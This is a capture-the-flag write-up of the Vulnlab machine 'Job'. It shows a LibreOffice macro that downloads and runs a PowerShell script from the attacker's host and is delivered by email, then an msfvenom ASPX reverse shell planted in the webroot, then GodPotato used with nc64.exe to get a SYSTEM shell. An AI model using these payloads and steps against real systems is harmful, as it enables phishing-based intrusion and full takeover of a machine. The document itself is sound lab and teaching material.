Job is a medium windows machine from Vulnlab created by xct. It involves getting Remote Code Execution (RCE) via Macros in LibreOffice Documents and exploiting SeImpersonatePrivilege for Privilege Escalation.

Recon

NMAP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-23 13:52 EDT
Nmap scan report for 10.10.69.83
Host is up (0.083s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Job.local
| http-methods:
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: JOB
|   NetBIOS_Domain_Name: JOB
|   NetBIOS_Computer_Name: JOB
|   DNS_Domain_Name: job
|   DNS_Computer_Name: job
|   Product_Version: 10.0.20348
|_  System_Time: 2023-10-23T17:52:39+00:00
| ssl-cert: Subject: commonName=job
| Not valid before: 2023-10-22T17:51:29
|_Not valid after:  2024-04-22T17:51:29
|_ssl-date: 2023-10-23T17:53:18+00:00; -1s from scanner time.
Service Info: Host: JOB; OS: Windows; CPE: cpe:/o:microsoft:windows

The Nmap scan tells us there are four ports open, SMTP on port 25, HTTP on port 80, SMB on port 445, and RDP on port 3389. It also tells us there is the job.local domain, so let’s add that to our hosts file.

Web

If we go to the website on port 80, we can see a note saying 

1
Please send your application to career@job.local! We recently switched to using open source products - please send your cv as a libre office document.

Shell as jack.black

The note on the website is hinting towards crafting a malicious macro and use it to get RCE. To do this, I will follow this great writeup by 0xdf which has a section that explains how to make a malicious macro that will run a system command upon opening it https://0xdf.gitlab.io/2020/02/01/htb-re.html.
The payload I am going to use is the following

1
2
3
4
5
6
7
REM  *****  BASIC  *****

Sub Main

	Shell("cmd /c powershell ""iex(new-object net.webclient).downloadstring('http://10.8.0.210/shell.ps1')""")

End Sub

Now after saving our file as <filename>.odt, let’s start a python server and a netcat listener

1
python3 -m http.server 80
1
nc -nlvp 443

At this point all we have to do is send the malicious file to the email that was written on the website career@job.local. I will use the sawks command to send the file

1
➜  job swaks --to career@job.local --header "CV" --body "meow" --attach meow.odt --server job.local

Wait for a few seconds and we get a shell as the user jack.black and we can read the user flag.

1
2
3
4
5
6
➜  job nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.0.210] from (UNKNOWN) [10.10.69.83] 54092

PS C:\Program Files\LibreOffice\program> whoami
job\jack.black

PrivEsc

Shell as apppool\defaultapppool

If we go to the web root directory C:\inetpub\wwwroot, we can see that we can write there, and since the web server is running as service account we can get a shell as that account and then use something like SeImpersonatePrivilege to escalate privileges.
Let’s prepare our aspx shell using msfvenom

1
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.0.210 LPORT=443 -f aspx -o exploit.aspx

Now we need to transfer it to the target machine and put it inside the wwwroot folder 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
PS C:\inetpub\wwwroot> iwr http://10.8.0.210/exploit.aspx -outfile exploit.aspx
PS C:\inetpub\wwwroot> ls


    Directory: C:\inetpub\wwwroot


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        11/10/2021   8:52 PM                aspnet_client
d-----         11/9/2021   9:24 PM                assets
d-----         11/9/2021   9:24 PM                css
d-----         11/9/2021   9:24 PM                js
-a----        10/23/2023   6:57 PM           3412 exploit.aspx

At this point, all we have to do is to trigger it by visiting the following url

1
http://10.10.69.83/exploit.aspx

We obtained a shell as the service user

1
2
3
4
5
6
7
8
9
➜  www nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.0.210] from (UNKNOWN) [10.10.69.83] 54509
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

Shell as system

If we run whomai /all, we can see that we have the SeImpersonatePrivilege enabled

1
SeImpersonatePrivilege Impersonate a client after authentication Enabled

We can exploit this privilege using GP tool, available at https://github.com/BeichenDream/GodPotato/releases.
First let’s grab gp.exe and nc64.exe from our box and start a netcat listener

1
PS C:\temp> iwr http://10.8.0.210/nc64.exe -outfile nc64.exe
1
PS C:\temp> iwr http://10.8.0.210/gp.exe -outfile gp.exe

Finally, let’s run this command

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
PS C:\temp> .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.0.210 443"
.\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.0.210 443"
[*] CombaseModule: 0x140714150002688
[*] DispatchTable: 0x140714152593272
[*] UseProtseqFunction: 0x140714151886704
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\d6ce89f6-a7b7-49fb-8d78-94633587bf42\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000ec02-11a4-ffff-e4d8-ec29d0ee3ee7
[*] DCOM obj OXID: 0xa8bd8a068d938289
[*] DCOM obj OID: 0x1eb21eda1a714cb1
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 976 Token:0x732  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 4080

And we have a shell as system and we can get the root flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
➜  www nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.0.210] from (UNKNOWN) [10.10.69.83] 54659

Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

C:\temp>
C:\temp>whoami
nt authority\system

C:\temp>type C:\users\administrator\desktop\root.txt
VL{REDCATED}

That concludes the box. I hope you learned something new :D